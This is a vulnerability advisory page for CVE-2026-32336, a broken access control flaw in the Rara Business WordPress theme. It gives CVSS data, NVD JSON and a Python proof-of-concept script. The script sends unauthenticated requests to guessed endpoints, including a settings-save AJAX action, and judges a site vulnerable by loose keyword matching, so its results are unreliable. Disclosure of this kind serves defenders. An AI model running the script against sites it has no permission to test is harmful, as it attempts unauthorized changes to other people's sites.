Security Vulnerability Report
中文
CVE-2026-32336 CVSS 5.3 MEDIUM

CVE-2026-32336

Published: 2026-03-13 19:54:44
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Rara Business rara-business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Business: from n/a through <= 1.3.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Rara Business主题 <= 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32336 PoC - Rara Business Theme Broken Access Control # This PoC demonstrates the Missing Authorization vulnerability in Rara Business theme import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32336 """ print(f"[*] Testing target: {target_url}") # Common Rara Business AJAX endpoints that may lack authorization potential_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/rara-business/v1/settings", "/wp-admin/admin.php?page=rara-business-settings" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } vulnerable = False for endpoint in potential_endpoints: url = target_url.rstrip('/') + endpoint # Test without authentication cookies try: if 'admin-ajax' in endpoint: # Test common AJAX actions in Rara Business data = { 'action': 'rara_business_save_settings', 'security': 'test' } response = requests.post(url, data=data, headers=headers, timeout=10) else: response = requests.get(url, headers=headers, timeout=10) # Check if response indicates unauthorized access is possible if response.status_code in [200, 400, 500]: # Analyze response for signs of broken access control if 'options' in response.text.lower() or 'settings' in response.text.lower(): print(f"[!] Potential vulnerability found at: {url}") print(f"[+] Status code: {response.status_code}") print(f"[+] Response length: {len(response.text)} bytes") vulnerable = True break except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") if vulnerable: print("\n[+] Target appears to be VULNERABLE to CVE-2026-32336") print("[+] Recommendation: Update Rara Business theme to version > 1.3.0") else: print("\n[-] Target does not appear to be vulnerable or theme not detected") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32336-poc.py <target_url>") print("Example: python cve-2026-32336-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32336", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:44.297", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Rara Business rara-business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Business: from n/a through <= 1.3.0."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en raratheme Rara Business rara-business permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Rara Business: desde n/a hasta &lt;= 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/rara-business/vulnerability/wordpress-rara-business-theme-1-3-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}